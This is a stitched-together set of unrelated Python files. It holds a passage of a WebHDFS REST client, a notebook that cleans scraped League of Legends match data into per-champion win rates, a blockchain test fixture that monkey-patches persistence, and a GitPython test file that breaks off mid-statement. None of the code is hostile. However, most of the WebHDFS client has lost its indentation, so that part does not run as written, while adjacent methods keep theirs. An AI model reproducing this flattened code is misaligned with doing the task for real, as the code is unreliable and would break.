POST http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=APPEND
[&buffersize=<INT>]
The function accepts all WebHDFS optional arguments shown above
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_data = '01010101010101010101010101010101'
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.append_file(my_file, my_data)
Example with optional args:
>>> hdfs.append_file(my_file, my_data, overwrite=True, buffersize=4096)
Note: The append_file function does not follow automatic redirects but
instead uses a two step call to the API as required in the
WebHDFS documentation
Append is not supported in Hadoop 1.x
"""
# make the initial APPEND call to the HDFS namenode
optional_args = kwargs
uri = self._create_uri(path, operations.APPEND, **optional_args)
init_response = requests.post(uri, allow_redirects=False)
if not init_response.status_code == http_client.TEMPORARY_REDIRECT:
_raise_pywebhdfs_exception(
init_response.status_code, init_response.content)
# Get the address provided in the location header of the
# initial response from the namenode and make the APPEND request
# to the datanode
uri = init_response.headers['location']
response = requests.post(
uri, data=file_data,
headers={'content-type': 'application/octet-stream'})
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return True
def read_file(self, path, **kwargs):
"""
Reads from a file on HDFS and returns the content
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=OPEN
[&offset=<LONG>][&length=<LONG>][&buffersize=<INT>]
Note: this function follows automatic redirects
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.read_file(my_file)
01010101010101010101010101010101
01010101010101010101010101010101
01010101010101010101010101010101
01010101010101010101010101010101
"""
optional_args = kwargs
uri = self._create_uri(path, operations.OPEN, **optional_args)
response = requests.get(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.content
def make_dir(self, path, **kwargs):
"""
Create a new directory on HDFS
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
PUT http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=MKDIRS
[&permission=<OCTAL>]
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_dir = 'user/hdfs/data/new_dir'
>>> hdfs.make_dir(my_dir)
Example with optional args:
>>> hdfs.make_dir(my_dir, permission=755)
"""
optional_args = kwargs
uri = self._create_uri(path, operations.MKDIRS, **optional_args)
response = requests.put(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return True
def rename_file_dir(self, path, destination_path):
"""
Rename an existing directory or file on HDFS
:param path: the HDFS file path without a leading '/'
:param destination_path: the new file path name
The function wraps the WebHDFS REST call:
PUT <HOST>:<PORT>/webhdfs/v1/<PATH>?op=RENAME&destination=<PATH>
Example:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> current_dir = 'user/hdfs/data/my_dir'
>>> destination_dir = 'user/hdfs/data/renamed_dir'
>>> hdfs.rename_file_dir(current_dir, destination_dir)
"""
destination_path = '/' + destination_path.lstrip('/')
uri = self._create_uri(path, operations.RENAME,
destination=destination_path)
response = requests.put(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.json()
def delete_file_dir(self, path, recursive=False):
"""
Delete an existing file or directory from HDFS
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
DELETE "http://<host>:<port>/webhdfs/v1/<path>?op=DELETE
[&recursive=<true|false>]
Example for deleting a file:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.delete_file_dir(my_file)
Example for deleting a directory:
>>> hdfs.delete_file_dir(my_file, recursive=True)
"""
uri = self._create_uri(path, operations.DELETE, recursive=recursive)
response = requests.delete(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return True
def get_file_dir_status(self, path):
"""
Get the file_status of a single file or directory on HDFS
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=GETFILESTATUS
Example for getting file status:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.get_file_dir_status(my_file)
{
"FileStatus":{
"accessTime":1371737704282,
"blockSize":134217728,
"group":"hdfs",
"length":90,
"modificationTime":1371737704595,
"owner":"hdfs",
"pathSuffix":"",
"permission":"755",
"replication":3,
"type":"FILE"
}
}
Example for getting directory status:
>>> my_dir = 'user/hdfs/data/'
>>> hdfs.get_file_dir_status(my_file)
{
"FileStatus":{
"accessTime":0,
"blockSize":0,
"group":"hdfs",
"length":0,
"modificationTime":1371737704208,
"owner":"hdfs",
"pathSuffix":"",
"permission":"755",
"replication":0,
"type":"DIRECTORY"
}
}
"""
uri = self._create_uri(path, operations.GETFILESTATUS)
response = requests.get(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.json()
    def get_content_summary(self, path):
        """
        Get the content summary of a directory on HDFS

        :param path: the HDFS file path without a leading '/'
        :returns: the decoded JSON response

        The function wraps the WebHDFS REST call:

        GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=GETCONTENTSUMMARY

        Example for getting a directory's content summary:

        >>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
        >>> my_folder = 'user/hdfs/data/'
        >>> hdfs.get_content_summary(my_folder)
        {
            "ContentSummary":
            {
                "directoryCount": 2,
                "fileCount": 1,
                "length": 24930,
                "quota": -1,
                "spaceConsumed": 24930,
                "spaceQuota": -1
            }
        }
        """
        uri = self._create_uri(path, operations.GETCONTENTSUMMARY)
        response = requests.get(uri, allow_redirects=True)

        # anything other than 200 OK is surfaced as a pywebhdfs error
        if not response.status_code == http_client.OK:
            _raise_pywebhdfs_exception(response.status_code, response.content)

        return response.json()
def get_file_checksum(self, path):
"""
Get the file_checksum of a single file on HDFS
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=GETFILECHECKSUM
Example for getting file status:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_file = 'user/hdfs/data/myfile.txt'
>>> hdfs.get_file_checksum(my_file)
{
"FileChecksum":{
"algorithm": "MD5-of-1MD5-of-512CRC32",
"bytes": "000002000000000000000000729a144ad5e9399f70c9bed...",
"length": 28
}
}
"""
uri = self._create_uri(path, operations.GETFILECHECKSUM)
response = requests.get(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.json()
def list_dir(self, path):
"""
Get a list of file_status for all files and directories
inside an HDFS directory
:param path: the HDFS file path without a leading '/'
The function wraps the WebHDFS REST call:
GET http://<HOST>:<PORT>/webhdfs/v1/<PATH>?op=LISTSTATUS
Example for listing a directory:
>>> hdfs = PyWebHdfsClient(host='host',port='50070', user_name='hdfs')
>>> my_dir = 'user/hdfs'
>>> hdfs.list_dir(my_dir)
{
"FileStatuses":{
"FileStatus":[
{
"accessTime":1371737704282,
"blockSize":134217728,
"group":"hdfs",
"length":90,
"modificationTime":1371737704595,
"owner":"hdfs",
"pathSuffix":"example3.txt",
"permission":"755",
"replication":3,
"type":"FILE"
},
{
"accessTime":1371678467205,
"blockSize":134217728,
"group":"hdfs","length":1057,
"modificationTime":1371678467394,
"owner":"hdfs",
"pathSuffix":"example2.txt",
"permission":"700",
"replication":3,
"type":"FILE"
}
]
}
}
"""
uri = self._create_uri(path, operations.LISTSTATUS)
response = requests.get(uri, allow_redirects=True)
if not response.status_code == http_client.OK:
_raise_pywebhdfs_exception(response.status_code, response.content)
return response.json()
def _create_uri(self, path, operation, **kwargs):
"""
internal function used to construct the WebHDFS request uri based on
the <PATH>, <OPERATION>, and any provided optional arguments
"""
path_param = quote(path.encode('utf8'))
# setup the parameter represent the WebHDFS operation
operation_param = '?op={operation}'.format(operation=operation)
# configure authorization based on provided credentials
auth_param = str()
if self.user_name:
auth_param = '&user.name={user_name}'.format(
user_name=self.user_name)
# setup any optional parameters
keyword_params = str()
for key in kwargs:
try:
value = quote_plus(kwargs[key].encode('utf8'))
except:
value = str(kwargs[key]).lower()
keyword_params = '{params}&{key}={value}'.format(
params=keyword_params, key=key, value=value)
# build the complete uri from the base uri and all configured params
uri = '{base_uri}{path}{operation}{keyword_args}{auth}'.format(
base_uri=self.base_uri, path=path_param,
operation=operation_param, keyword_args=keyword_params,
auth=auth_param)
return uri
def _raise_pywebhdfs_exception(resp_code, message=None):
    """
    Translate an HTTP status code into the matching pywebhdfs error.

    :param resp_code: the HTTP status code returned by WebHDFS
    :param message: optional response body passed through as the error msg
    :raises: the specific errors.* subclass for known status codes, or
        the generic errors.PyWebHdfsException otherwise
    """
    code_to_error = {
        http_client.BAD_REQUEST: errors.BadRequest,
        http_client.UNAUTHORIZED: errors.Unauthorized,
        http_client.NOT_FOUND: errors.FileNotFound,
        http_client.METHOD_NOT_ALLOWED: errors.MethodNotAllowed,
    }
    error_cls = code_to_error.get(resp_code, errors.PyWebHdfsException)
    raise error_cls(msg=message)
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.11.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Cleaning scraped game data
#
# Here we show how to use the data obtained with Scrapy. In order to use it for data analysis and game outcome predictions, we first need to clean the data.
#
# Let's start with importing the packages we'll use:
import pandas as pd # Dataframes
import numpy as np # number crunching, matrices and all that
# Let's now import the scraped data and perform a first simple cleaning step:
# 1. We import the `.csv` file to a pandas data frame.
# 2. There are games that were scraped multiple times because multiple of the selected top players were involved in them (a game might pop up in our data up to 10 times because of this). As these duplicates would skew the statistics, we remove them via `drop_duplicates`, using the starting time (`timestamp`) and the duration (`duration`) as unique identifiers.
# 3. We reset the index of the data frame, which can be done explicitly (see commented line) or implicitly when removing duplicates via `ignore_index=True`.
df = pd.read_csv('../data/raw/games.csv')
df.drop_duplicates(subset=['duration', 'timestamp', 'team_1', 'team_2', 'winner'], inplace=True, keep='first', ignore_index=True)
# df.reset_index(drop=True, inplace=True)
# Show how many unique games remain after deduplication, plus a preview.
print(len(df))
df.head()
# As we can see in the print-out of the data frame head above, we now have unique games in `df`, with the columns `duration`, `server`, `summoner_name`, `team_1`, `team_2`, `timestamp` and `winner`. We will usually discard the server, player (summoner) and time information in our analysis.
#
# In order to capture the roles of the played champions, which currently is implicitly stored in their order in `team_1` and `team_2`, we create 10 new columns - 5 for the red and blue team each - and store the champions individually:
# The champion roles, in the order they appear inside team_1 and team_2.
roles = ['Top', 'Jng', 'Mid', 'Adc', 'Sup']

# Split each comma-separated team column into five per-role columns
# (BTop ... BSup for the blue side, RTop ... RSup for the red side).
for prefix, column in (('B', 'team_1'), ('R', 'team_2')):
    split_champs = df[column].str.split(',', expand=True)
    for idx, role_name in enumerate(roles):
        df[f"{prefix}{role_name}"] = split_champs[idx]
df.drop(columns=['team_1', 'team_2'], inplace=True)
# _Note on performance_: The above splitting of `team_1` and `team_2` is done for the entire data frame "at once" as we are using an internal pandas function (`pd.Series.str.split`) and then assign the full columns to the new role columns `BTop`, `BJng`... of `df`.
#
# Let's now rewrite the `winner` column to use `'Blue'` and `'Red'` instead of `'Team 1'` and `'Team 2'`, and drop the above mentioned columns of information we do not take into account.
#
# We also already can do a first step of data analysis and consider some stats:
# np.where is vectorized and replaces the much slower row-wise
# df.apply(..., axis=1) while producing identical results: 'Team 1'
# becomes 'Blue', anything else becomes 'Red'.
df['winner'] = np.where(df['winner'] == 'Team 1', 'Blue', 'Red')
# Drop metadata columns that are not used in the analysis.
df.drop(['server', 'summoner_name', 'duration', 'timestamp'], axis=1, inplace=True)
# Some statistics:
num_games = len(df)  # Total number of games
num_blue_wins = len(df[df['winner']=='Blue'])  # No of games blue won
num_red_wins = len(df[df['winner']=='Red'])  # No of games red won
# Sanity check: every game must have exactly one (blue or red) winner.
assert num_red_wins + num_blue_wins == num_games  # Make sure we do not have a bad row without winner or such.
blue_winrate = num_blue_wins/num_games
red_winrate = num_red_wins/num_games
print(f"There are {num_games} games recorded, the blue team won {num_blue_wins},",
      f"the red team won {num_red_wins} of these games.",
      f"\nThis yields win rates of {blue_winrate*100:.2f}% (blue) and {red_winrate*100:.2f}% (red).")
# ### Looking at the champion stats
# Now we will prepare a second important data frame using the data above: The statistics per champion.
# To get the unique champion names, let's use `np.unique` on all role columns in `df`.
# Column-name lists for the five blue-side and five red-side role columns.
Blue = [f'B{role}' for role in roles]
Red = [f'R{role}' for role in roles]
# Sorted array of all distinct champion names appearing on either side.
champions = np.unique(df[Blue+Red])
# cd = pd.DataFrame(champions, columns=['Champion'])
# Now we compute the statistics per champion.
#
# In order to speed up the process by using `dict` lookups (which are very fast), we will not do the following steps in the `cd` data frame directly but make use of four separate dictionaries that capture the numbers of games/wins on the blue/red side for each champion. We also memorize the roles that the champions were played in, using a `dict` with `dict`s as values.
#
# To actually count the values we are interested in, we iterate over the data frame of games `df` _once_, adding to the per-side play counters for every champion in a row and (via python's automatic bool-to-int casting) adding the win flag to the per-side win counters.
# +
blue_played = dict.fromkeys(champions, 0)
blue_won = dict.fromkeys(champions, 0)
red_played = dict.fromkeys(champions, 0)
red_won = dict.fromkeys(champions, 0)
roles_played = {champ: dict.fromkeys(roles, 0) for champ in champions}

for _, row in df.iterrows():
    blue_win = row.winner == 'Blue'
    red_win = not blue_win
    # One loop body handles both sides; the boolean win flag contributes
    # 1 (win) or 0 (loss) to the win counter.
    for side_cols, played, won, is_win in (
            (Blue, blue_played, blue_won, blue_win),
            (Red, red_played, red_won, red_win)):
        for col in side_cols:
            name = row[col]
            played[name] += 1
            won[name] += is_win
            # Strip the leading 'B'/'R' to recover the role name.
            roles_played[name][col[1:]] += 1
# -
# Before storing everything in a data frame, let's figure out which were the most played roles per champion. For this, we iterate over the champions and sort the roles by their occurences for each champion. The `number_of_roles_to_record` most played roles and their counters are then stored in individual lists and linked to keys, for example `"Role1"` and `"#Role1"`, in a dictionary:
# +
number_of_roles_to_record = 2  # We use 2 roles, could use up to all 5

ordered_roles_played = [[] for _ in range(number_of_roles_to_record)]
numbers_roles_played = [[] for _ in range(number_of_roles_to_record)]

# (The previous enumerate() here was unnecessary: the index was never used.)
for champ in champions:
    # This is a list of tuples (role, #plays in the role):
    roles_for_this_champ = list(roles_played[champ].items())
    # sort by number of plays, in descending order (reverse=True)
    sorted_roles_for_this_champ = sorted(roles_for_this_champ, key=lambda x: x[1], reverse=True)
    # Now let's record the sorted tuples as order of most played roles (and their # of plays)
    for j in range(number_of_roles_to_record):
        ordered_roles_played[j].append(sorted_roles_for_this_champ[j][0])  # Record the role
        numbers_roles_played[j].append(sorted_roles_for_this_champ[j][1])  # Record the # of plays

most_played_roles = {f"Role{j+1}": ordered_roles_played[j] for j in range(number_of_roles_to_record)}
most_played_numbers = {f"#Role{j+1}": numbers_roles_played[j] for j in range(number_of_roles_to_record)}
# -
# Having all statistics sorted out, we can wrap everything up in a data frame. Because of the way we stored the most played roles above, we have a flexible pipeline that will generate the data frame for any number of most-played roles we want to store per champion.
# One row per champion: per-side play/win counters, plus the most played
# roles and their counts unpacked from the dictionaries built above.
cd = pd.DataFrame({
    'Champion': champions,
    'BluePlayed': [blue_played[champ] for champ in champions],
    'BlueWon': [blue_won[champ] for champ in champions],
    'RedPlayed': [red_played[champ] for champ in champions],
    'RedWon': [red_won[champ] for champ in champions],
    **most_played_roles,
    **most_played_numbers,
})
# We conclude the first round of data analysis by computing the total number of games played and the win rate on either side as well as in total, for each champion. For this, the column-wise operations on a data frame are very handy:
cd['TotalPlayed'] = cd['BluePlayed'] + cd['RedPlayed']
# NOTE(review): a champion never played on one side gives a 0/0 division
# here; pandas yields NaN rather than raising - confirm downstream
# consumers of the csv handle that.
cd['Bluewinrate'] = cd['BlueWon'] / cd['BluePlayed']
cd['Redwinrate'] = cd['RedWon'] / cd['RedPlayed']
cd['Totalwinrate'] = (cd['BlueWon'] + cd['RedWon']) / cd['TotalPlayed']
# The resulting data frame looks like this:
# cd
# For other parts of the project we will want to come back to this data. Let's store it in a new `.csv` file.
cd.to_csv('../data/processed/ChampionStatsDemo.csv',index=False)
|
import tarfile
import requests
import shutil
import binascii
import os
import neo
import struct
import asyncio
from contextlib import contextmanager
from neo.Utils.NeoTestCase import NeoTestCase
from neo.Storage.Implementation.DBFactory import getBlockchainDB
from neo.Storage.Interface.DBInterface import DBInterface
from neo.Storage.Common.DBPrefix import DBPrefix
from neo.SmartContract.ApplicationEngine import ApplicationEngine
from neo.Core.Blockchain import Blockchain
from neo.Core.Fixed8 import Fixed8
from neo.Implementations.Notifications.NotificationDB import NotificationDB
from neo.Settings import settings
from neo.logging import log_manager
from neo.Storage.Common.CachedScriptTable import CachedScriptTable
from neo.Core.State.CoinState import CoinState
from neo.Core.State.AccountState import AccountState
from neo.Core.State.UnspentCoinState import UnspentCoinState
from neo.Core.State.SpentCoinState import SpentCoinState, SpentCoinItem
from neo.Core.State.AssetState import AssetState
from neo.Core.State.ContractState import ContractPropertyState
from neo.Core.State.ContractState import ContractState
from neo.Core.State.StorageItem import StorageItem
from neo.Core.State.ValidatorState import ValidatorState
from neo.Core.TX.Transaction import Transaction, TransactionType
from neo.Network.nodemanager import NodeManager
from neo.SmartContract import TriggerType
from neo.Core.UInt160 import UInt160
logger = log_manager.getLogger()
def MonkeyPatchPersist(self, block, snapshot=None):
    """
    Test-only replacement for ``Blockchain.Persist``.

    Applies a block's transactions to a DB snapshot — updating unspent and
    spent coins, account balances, and the type-specific state (assets,
    validators, contracts) — and, for an InvocationTransaction, returns the
    result of ``ApplicationEngine.Run`` so tests can inspect it directly.

    :param block: the Block whose transactions are persisted
    :param snapshot: optional DB snapshot; a fresh one is created when None
    :return: the ApplicationEngine.Run result for the first
        InvocationTransaction encountered, otherwise None
    """
    if snapshot is None:
        snapshot = self._db.createSnapshot()

    snapshot.PersistingBlock = block

    # accumulated system fee up to and including this block
    amount_sysfee = self.GetSysFeeAmount(block.PrevHash) + (block.TotalFees().value / Fixed8.D)
    # NOTE(review): the packed sysfee bytes are computed but never used in
    # this patched version - presumably the real Persist writes them to the
    # DB; confirm the omission is intentional for tests.
    amount_sysfee_bytes = struct.pack("<d", amount_sysfee)

    with self._db.getBatch() as wb:
        for tx in block.Transactions:
            # register the tx outputs as fresh unspent coins
            unspentcoinstate = UnspentCoinState.FromTXOutputsConfirmed(tx.outputs)
            snapshot.UnspentCoins.Add(tx.Hash.ToBytes(), unspentcoinstate)

            # go through all the accounts in the tx outputs
            for output in tx.outputs:
                account = snapshot.Accounts.GetAndChange(output.AddressBytes, lambda: AccountState(output.ScriptHash))

                if account.HasBalance(output.AssetId):
                    account.AddToBalance(output.AssetId, output.Value)
                else:
                    account.SetBalanceFor(output.AssetId, output.Value)

            # go through all tx inputs, deduplicated by previous tx hash
            unique_tx_input_hashes = []
            for input in tx.inputs:
                if input.PrevHash not in unique_tx_input_hashes:
                    unique_tx_input_hashes.append(input.PrevHash)

            for txhash in unique_tx_input_hashes:
                prevTx, height = self.GetTransaction(txhash.ToBytes())
                coin_refs_by_hash = [coinref for coinref in tx.inputs if
                                     coinref.PrevHash.ToBytes() == txhash.ToBytes()]
                for input in coin_refs_by_hash:
                    # flag the consumed output as spent
                    snapshot.UnspentCoins.GetAndChange(input.PrevHash.ToBytes()).Items[input.PrevIndex] |= CoinState.Spent

                    # spending a governing-token (SystemShare) output is
                    # additionally recorded in SpentCoins for later claims
                    if prevTx.outputs[input.PrevIndex].AssetId.ToBytes() == Blockchain.SystemShare().Hash.ToBytes():
                        sc = snapshot.SpentCoins.GetAndChange(input.PrevHash.ToBytes(), lambda: SpentCoinState(input.PrevHash, height, []))
                        sc.Items.append(SpentCoinItem(input.PrevIndex, block.Index))

                    # debit the sending account by the consumed output value
                    output = prevTx.outputs[input.PrevIndex]
                    acct = snapshot.Accounts.GetAndChange(prevTx.outputs[input.PrevIndex].AddressBytes, lambda: AccountState(output.ScriptHash))
                    assetid = prevTx.outputs[input.PrevIndex].AssetId
                    acct.SubtractFromBalance(assetid, prevTx.outputs[input.PrevIndex].Value)

            # do a whole lotta stuff with tx here...
            if tx.Type == TransactionType.RegisterTransaction:
                asset = AssetState(tx.Hash, tx.AssetType, tx.Name, tx.Amount,
                                   Fixed8(0), tx.Precision, Fixed8(0), Fixed8(0), UInt160(data=bytearray(20)),
                                   tx.Owner, tx.Admin, tx.Admin, block.Index + 2 * 2000000, False)
                snapshot.Assets.Add(tx.Hash.ToBytes(), asset)
            elif tx.Type == TransactionType.IssueTransaction:
                # negative result amounts correspond to newly issued units
                txresults = [result for result in tx.GetTransactionResults() if result.Amount.value < 0]
                for result in txresults:
                    asset = snapshot.Assets.GetAndChange(result.AssetId.ToBytes())
                    asset.Available = asset.Available - result.Amount
            elif tx.Type == TransactionType.ClaimTransaction:
                for input in tx.Claims:
                    sc = snapshot.SpentCoins.TryGet(input.PrevHash.ToBytes())
                    if sc and sc.HasIndex(input.PrevIndex):
                        sc.DeleteIndex(input.PrevIndex)
                        snapshot.SpentCoins.GetAndChange(input.PrevHash.ToBytes())
            elif tx.Type == TransactionType.EnrollmentTransaction:
                snapshot.Validators.GetAndChange(tx.PublicKey.ToBytes(), lambda: ValidatorState(pub_key=tx.PublicKey))
                # logger.info("VALIDATOR %s " % validator.ToJson())
            elif tx.Type == TransactionType.StateTransaction:
                # @TODO Implement persistence for State Descriptors
                pass
            elif tx.Type == TransactionType.PublishTransaction:
                def create_contract_state():
                    return ContractState(tx.Code, tx.NeedStorage, tx.Name, tx.CodeVersion, tx.Author, tx.Email, tx.Description)
                snapshot.Contracts.GetAndChange(tx.Code.ScriptHash().ToBytes(), create_contract_state)
            elif tx.Type == TransactionType.InvocationTransaction:
                # NOTE: returning here skips persistence of any remaining
                # transactions in the block - acceptable for these tests
                return ApplicationEngine.Run(TriggerType.Application, tx, snapshot.Clone(), tx.Gas, True, wb)
def MonkeyPatchRun(trigger_type, tx, snapshot, gas, test_mode=True, wb=None):
    """
    Test-only replacement for ``ApplicationEngine.Run``.

    Loads the transaction's script into a fresh ApplicationEngine and
    executes it.

    :param trigger_type: the TriggerType for the engine
    :param tx: the transaction whose Script is executed
    :param snapshot: DB snapshot the engine operates on
    :param gas: the gas budget for execution
    :param test_mode: when True, return True/False for success/failure
        instead of completing execution against the service
    :param wb: write batch (unused here; kept for signature compatibility)
    :return: True/False in test mode, otherwise the engine instance
    """
    engine = ApplicationEngine(
        trigger_type=trigger_type,
        container=tx,
        snapshot=snapshot,
        gas=gas,
        testMode=test_mode
    )

    # The script is normally hex encoded; fall back to using it verbatim
    # when it is already raw bytes. binascii.Error/TypeError are exactly
    # what unhexlify raises on non-hex input - the previous broad
    # `except Exception` would also have masked unrelated bugs.
    try:
        _script = binascii.unhexlify(tx.Script)
    except (binascii.Error, TypeError):
        _script = tx.Script

    engine.LoadScript(_script)

    # normally, this function does not return true/false
    # for testing purposes, we try to execute and if an exception is raised
    # we will return false, otherwise if success return true
    # this is different than the 'success' bool returned by engine.Execute()
    # the 'success' bool returned by engine.Execute() is a value indicating
    # wether or not the invocation was successful, and if so, we then commit
    # the changes made by the contract to the database
    try:
        success = engine.Execute()
        # service.ExecutionCompleted(engine, success)
        if test_mode:
            return True
        else:
            engine.testMode = True
            engine._Service.ExecutionCompleted(engine, success)
    except Exception as e:
        # service.ExecutionCompleted(self, False, e)
        if test_mode:
            return False
        else:
            engine.testMode = True
            engine._Service.ExecutionCompleted(engine, False, e)

    return engine
class BlockchainFixtureTestCase(NeoTestCase):
    """
    Base test case that provisions a fixture blockchain DB and a fixture
    notification DB (downloading and extracting the tarballs on first use)
    and offers a context manager that monkey-patches persistence for
    deterministic test runs.
    """

    FIXTURE_REMOTE_LOC = 'https://s3.us-east-2.amazonaws.com/cityofzion/fixtures/fixtures_v10.tar.gz'
    FIXTURE_FILENAME = os.path.join(settings.DATA_DIR_PATH, 'Chains/fixtures_v10.tar.gz')

    N_FIXTURE_REMOTE_LOC = 'https://s3.us-east-2.amazonaws.com/cityofzion/fixtures/notif_fixtures_v10.tar.gz'
    N_FIXTURE_FILENAME = os.path.join(settings.DATA_DIR_PATH, 'Chains/notif_fixtures_v10.tar.gz')
    N_NOTIFICATION_DB_NAME = os.path.join(settings.DATA_DIR_PATH, 'fixtures/test_notifications')

    _blockchain = None

    wallets_folder = os.path.dirname(neo.__file__) + '/Utils/fixtures/'

    # originals saved while the monkey patches are active
    _old_persist = None
    _old_run = None

    @classmethod
    @contextmanager
    def MPPersist(cls):
        """Context manager that swaps in the test Persist/Run patches and
        restores the originals on exit."""
        # monkey patch Persist for test:
        cls._old_persist = Blockchain.Persist
        Blockchain.Persist = MonkeyPatchPersist

        # monkey patch Run for test:
        cls._old_run = ApplicationEngine.Run
        ApplicationEngine.Run = MonkeyPatchRun

        yield

        Blockchain.Persist = cls._old_persist
        ApplicationEngine.Run = cls._old_run

    def __init__(self, *args, **kwargs):
        super(BlockchainFixtureTestCase, self).__init__(*args, **kwargs)

    @classmethod
    def leveldb_testpath(cls):
        # subclasses must point this at their extracted fixture chain
        return 'Override Me!'

    @classmethod
    def _setup_fixture_db(cls, description, remote_loc, filename, expected_path):
        """Download (if not cached), extract, and verify one fixture
        tarball.

        :param description: short label used in the download log message
        :param remote_loc: URL of the fixture tarball
        :param filename: local path the tarball is cached at
        :param expected_path: path that must exist after extraction
        """
        if not os.path.exists(filename):
            logger.info(
                "downloading fixture %s database from %s. this may take a while" % (description, remote_loc))

            response = requests.get(remote_loc, stream=True)
            response.raise_for_status()
            os.makedirs(os.path.dirname(filename), exist_ok=True)
            with open(filename, 'wb+') as handle:
                for block in response.iter_content(1024):
                    handle.write(block)

        # extraction always runs, even for a cached tarball
        try:
            tar = tarfile.open(filename)
            tar.extractall(path=settings.DATA_DIR_PATH)
            tar.close()
        except Exception as e:
            raise Exception(
                "Could not extract tar file - %s. You may want need to remove the fixtures file %s manually to fix this." % (e, filename))

        if not os.path.exists(expected_path):
            raise Exception("Error downloading fixtures at %s" % expected_path)

    @classmethod
    def setUpClass(cls):
        Blockchain.DeregisterBlockchain()
        super(BlockchainFixtureTestCase, cls).setUpClass()

        # for some reason during testing asyncio.get_event_loop() fails and does not create a new one if needed. This is the workaround
        try:
            loop = asyncio.get_running_loop()
        except RuntimeError:
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)

        nodemgr = NodeManager()
        nodemgr.reset_for_test()

        # setup Blockchain DB
        cls._setup_fixture_db('block', cls.FIXTURE_REMOTE_LOC,
                              cls.FIXTURE_FILENAME, cls.leveldb_testpath())

        settings.setup_unittest_net()

        cls._blockchain = Blockchain(getBlockchainDB(path=cls.leveldb_testpath()), skip_version_check=True)
        cls._blockchain.UT = True
        Blockchain.RegisterBlockchain(cls._blockchain)

        # setup Notification DB
        cls._setup_fixture_db('notification', cls.N_FIXTURE_REMOTE_LOC,
                              cls.N_FIXTURE_FILENAME, cls.N_NOTIFICATION_DB_NAME)

        settings.NOTIFICATION_DB_PATH = cls.N_NOTIFICATION_DB_NAME
        ndb = NotificationDB.instance()
        ndb.start()

    @classmethod
    def tearDownClass(cls):
        # tear down Blockchain DB
        Blockchain.Default().DeregisterBlockchain()
        if cls._blockchain is not None:
            cls._blockchain.UT = False
            cls._blockchain.Dispose()
        shutil.rmtree(cls.leveldb_testpath())

        # tear down Notification DB
        NotificationDB.instance().close()
        shutil.rmtree(cls.N_NOTIFICATION_DB_NAME)
|
<gh_stars>1-10
# Copyright (C) 2010, 2011 <NAME> (<EMAIL>) and contributors
#
# This module is part of GitDB and is released under
# the New BSD License: http://www.opensource.org/licenses/bsd-license.php
from git.test.lib import rorepo_dir
from git.test.db.base import RepoBase
from git.util import bin_to_hex
from git.exc import BadObject
from git.db.complex import CmdCompatibilityGitDB
from git.db.cmd.base import *
from git.refs import TagReference, Reference, RemoteReference
class TestBase(RepoBase):
    """Tests for the command-based compatibility git database."""
    RepoCls = CmdCompatibilityGitDB

    def test_basics(self):
        gdb = self.rorepo

        # partial to complete - works with everything
        hexsha = bin_to_hex(gdb.partial_to_complete_sha_hex("0.1.6"))
        assert len(hexsha) == 40

        assert bin_to_hex(gdb.partial_to_complete_sha_hex(hexsha[:20])) == hexsha

        # fails with BadObject
        for invalid_rev in ("0000", "bad/ref", "super bad"):
            self.failUnlessRaises(BadObject, gdb.partial_to_complete_sha_hex, invalid_rev)

    def test_fetch_info_invalid_lines(self):
        # BUG FIX: this test was previously also named `test_fetch_info`,
        # so the second definition below silently shadowed it and the test
        # never ran. Renamed so both tests are collected.
        # NOTE(review): `CmdCmdFetchInfo` (vs `CmdFetchInfo` used below)
        # comes in via the star-import - the doubled 'Cmd' looks like a
        # typo; confirm the name actually exists.
        self.failUnlessRaises(ValueError, CmdCmdFetchInfo._from_line, self.rorepo, "nonsense", '')
        self.failUnlessRaises(ValueError, CmdCmdFetchInfo._from_line, self.rorepo, "? [up to date] 0.1.7RC -> origin/0.1.7RC", '')

    def test_fetch_info(self):
        # assure we can handle remote-tracking branches
        fetch_info_line_fmt = "c437ee5deb8d00cf02f03720693e4c802e99f390 not-for-merge %s '0.3' of git://github.com/gitpython-developers/GitPython"
        remote_info_line_fmt = "* [new branch] nomatter -> %s"

        fi = CmdFetchInfo._from_line(self.rorepo,
